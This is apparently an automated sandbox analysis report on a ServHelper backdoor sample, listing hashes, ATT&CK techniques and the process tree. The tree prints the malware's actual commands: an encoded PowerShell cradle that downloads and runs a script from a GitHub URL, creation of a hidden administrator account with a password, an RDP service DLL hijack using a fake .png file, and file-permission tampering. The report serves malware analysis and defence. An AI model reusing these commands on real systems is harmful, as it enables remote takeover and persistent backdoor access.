servhelper | 4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150

Analysis

max time kernel
143s
max time network
122s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-02-2022 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe
Size

4.6MB
MD5

04eea56890bbc52dca52129a16167964
SHA1

cb202a349506896aac49ee46ceb8d1c66c23797d
SHA256

4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150
SHA512

22703fc48e0c109d02a3e8fc774bcfbe0390d54a19473985235b50ace594de1101de2379daced1a2cd08ff96884099bdf97c39988de6c2c814c40fe23143893c

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1680 powershell.exe
6 1680 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

408 icacls.exe
1060 icacls.exe
964 icacls.exe
1876 icacls.exe
1252 icacls.exe
1764 takeown.exe
1352 icacls.exe
1964 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

flow	pid	process
5	1680	powershell.exe
6	1680	powershell.exe

pid	process
408	icacls.exe
1060	icacls.exe
964	icacls.exe
1876	icacls.exe
1252	icacls.exe
1764	takeown.exe
1352	icacls.exe
1964	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

1908
1908
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1876 icacls.exe
1252 icacls.exe
1764 takeown.exe
1352 icacls.exe
1964 icacls.exe
408 icacls.exe
1060 icacls.exe
964 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1908
1908

pid	process
1876	icacls.exe
1252	icacls.exe
1764	takeown.exe
1352	icacls.exe
1964	icacls.exe
408	icacls.exe
1060	icacls.exe
964	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LU5FIBZPNPYP3NLY4B9E.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b006014b0717d801	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

916 reg.exe
Runs net.exe

pid	process
916	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1464	powershell.exe
836	powershell.exe
1572	powershell.exe
588	powershell.exe
1464	powershell.exe
1464	powershell.exe
1464	powershell.exe
1680	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

Processes:

pid process

468
1908
1908
1908

pid	process
468
1908
1908
1908

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeRestorePrivilege	1964	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeAuditPrivilege	1984	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeAuditPrivilege	1984	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeAuditPrivilege	1068	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeAuditPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1680	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 1668 wrote to memory of 1464	1668	4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe	powershell.exe
PID 1668 wrote to memory of 1464	1668	4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe	powershell.exe
PID 1668 wrote to memory of 1464	1668	4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe	powershell.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	csc.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	csc.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	csc.exe
PID 1964 wrote to memory of 1996	1964	csc.exe	cvtres.exe
PID 1964 wrote to memory of 1996	1964	csc.exe	cvtres.exe
PID 1964 wrote to memory of 1996	1964	csc.exe	cvtres.exe
PID 1464 wrote to memory of 836	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 836	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 836	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 1572	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 1572	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 1572	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 588	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 588	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 588	1464	powershell.exe	powershell.exe
PID 1464 wrote to memory of 1764	1464	powershell.exe	takeown.exe
PID 1464 wrote to memory of 1764	1464	powershell.exe	takeown.exe
PID 1464 wrote to memory of 1764	1464	powershell.exe	takeown.exe
PID 1464 wrote to memory of 1352	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1352	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1352	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 408	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 408	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 408	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1060	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1060	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1060	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 964	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1876	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1876	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1876	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1252	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1252	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1252	1464	powershell.exe	icacls.exe
PID 1464 wrote to memory of 1832	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 1832	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 1832	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 916	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 916	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 916	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 2024	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 2024	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 2024	1464	powershell.exe	reg.exe
PID 1464 wrote to memory of 1072	1464	powershell.exe	net.exe
PID 1464 wrote to memory of 1072	1464	powershell.exe	net.exe
PID 1464 wrote to memory of 1072	1464	powershell.exe	net.exe
PID 1072 wrote to memory of 808	1072	net.exe	net1.exe
PID 1072 wrote to memory of 808	1072	net.exe	net1.exe
PID 1072 wrote to memory of 808	1072	net.exe	net1.exe
PID 1464 wrote to memory of 936	1464	powershell.exe	cmd.exe
PID 1464 wrote to memory of 936	1464	powershell.exe	cmd.exe
PID 1464 wrote to memory of 936	1464	powershell.exe	cmd.exe
PID 936 wrote to memory of 1776	936	cmd.exe	cmd.exe
PID 936 wrote to memory of 1776	936	cmd.exe	cmd.exe
PID 936 wrote to memory of 1776	936	cmd.exe	cmd.exe
PID 1776 wrote to memory of 1720	1776	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe
"C:\Users\Admin\AppData\Local\Temp\4d7fcc25614e0b6efb83dcca19925cfca5f7ea519b6d1ac859c011a9faba9150.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hy7ivy0i.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7936.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7926.tmp"
      4⤵
      PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:588
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1764
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1352
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:408
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1060
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:964
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1876
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1252
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:916
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2024
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:808
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1776
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1720
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:828
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:2016
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:700
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1304
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1500
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:920

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1412
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1552

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ae5XQ55u /add
1⤵
PID:1664
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc ae5XQ55u /add
  2⤵
  PID:304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc ae5XQ55u /add
    3⤵
    PID:1208

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:636
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:984

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" VQVVOAJK$ /ADD
1⤵
PID:1876
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" VQVVOAJK$ /ADD
  2⤵
  PID:688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" VQVVOAJK$ /ADD
    3⤵
    PID:676

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2000
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1948

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ae5XQ55u
1⤵
PID:1008
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc ae5XQ55u
  2⤵
  PID:936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc ae5XQ55u
    3⤵
    PID:2040

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2016
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1984

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1508
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1068

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:984
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7936.tmp

MD5
fa28cbc24a2282f3cb5729cb7e60a460

SHA1
a653ec773d2ed7fe37a7c3ed82d070fdc32d5433

SHA256
24de2b48d490694f7e666fdb59fefdcd7f806c8de9e408d35afdca6157b3d1fa

SHA512
cd467a2bf66ef05121739af885b682111ef5ef10642cf2a7dcc1b5fd9abbc6fab1652043b52fce94a8e4b10484be08c203429555e31f830bc0444929992feeda

Download Submit
C:\Users\Admin\AppData\Local\Temp\hy7ivy0i.dll

MD5
cd54578d1d3bfdf728cbdbeec88f47b5

SHA1
8ad51d48a3769634f1a352627dab93454063da0f

SHA256
6d58ab6818cd0be1b1061c144059b12bdb62e43298226930daea20cc98f03613

SHA512
2be1fc098c4bcdf49ee715b4aefbf88d2b02437081956239d34f7c10cd49540ebf4e1e31ae30fb0be3d6da6f94bb2f04e647b87777f9cd9736630c9320bdb9df

Download Submit
C:\Users\Admin\AppData\Local\Temp\hy7ivy0i.pdb

MD5
ab09ff6888dc93b0b35247d04b4f28d0

SHA1
b56354abf2735fd3d5a34b722f978a11fee14d56

SHA256
6fab250d6cc358e4aeb1b3efbe1a5285e4b9ece858c646f3b01b94f16cca792d

SHA512
83d0735659831f666ab74c4694c927144ee5d24e2681980035d2708f9e2620b3601587bf5c53ccce5d514f4463ec8d620ae13bf1c0dac51926c2ef3664cd5909

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5
43473f4e719958639a9d89e5d8388999

SHA1
ccb79eb606a23daa4b3ff8f996a2fbf281f31491

SHA256
ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734

SHA512
1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
dc672e70b1096c1458076d6fd03f5bca

SHA1
b2e84e0b486927e6e96d3b24e14fe2c782bb36f5

SHA256
92b9e0fc2908bf407c19c24b950d1fef56c755db38b2f6bce59929cf4f7d5392

SHA512
de9ed1f721ae7bc49725402d73036d15c13c40b5b656b630aef9f75862d463988e0143c8a15552e24d70f64120aaef26a130dfb2cbcecd49daf5e8d0394b6bfe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
dc672e70b1096c1458076d6fd03f5bca

SHA1
b2e84e0b486927e6e96d3b24e14fe2c782bb36f5

SHA256
92b9e0fc2908bf407c19c24b950d1fef56c755db38b2f6bce59929cf4f7d5392

SHA512
de9ed1f721ae7bc49725402d73036d15c13c40b5b656b630aef9f75862d463988e0143c8a15552e24d70f64120aaef26a130dfb2cbcecd49daf5e8d0394b6bfe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
dc672e70b1096c1458076d6fd03f5bca

SHA1
b2e84e0b486927e6e96d3b24e14fe2c782bb36f5

SHA256
92b9e0fc2908bf407c19c24b950d1fef56c755db38b2f6bce59929cf4f7d5392

SHA512
de9ed1f721ae7bc49725402d73036d15c13c40b5b656b630aef9f75862d463988e0143c8a15552e24d70f64120aaef26a130dfb2cbcecd49daf5e8d0394b6bfe

Download Submit
C:\Windows\system32\rfxvmt.dll

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7926.tmp

MD5
fc625ab051e0821f9339e6a3fe7d4ad7

SHA1
969a35112450dd1d2b8f4ffa592019fe02100710

SHA256
c4d8feeedc0edd6e8760a53b4cfcadda799009e6ba01d63cb58bfea663b187d6

SHA512
5f620398c3a8b38f0bd3c49c932f0d91564b17b6038c0f74c691c9043e4bbde7813417db03a76ddb85011bd8b8e5e916b2b562898f073d9438dc64b08419a835

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hy7ivy0i.0.cs

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hy7ivy0i.cmdline

MD5
1f4c459556151d41a977651d0aca41fd

SHA1
c1d8b735c6d958d136a05cb9d3ca0a8d49579524

SHA256
445f7a203cb54085da04ea86c035c93a16fcd80685b3c55a5f32e62e7d1769d5

SHA512
59fba8ef616e7a592f9153e19b6e71fa5ee1e51a72cec3f37dc7700350918fe6925a5b3ed9694c7f449fdd9700351abcef706bdef7af1af8765c5da1b49e0e08

Download Submit
\Windows\Branding\mediasrv.png

MD5
271eacd9c9ec8531912e043bc9c58a31

SHA1
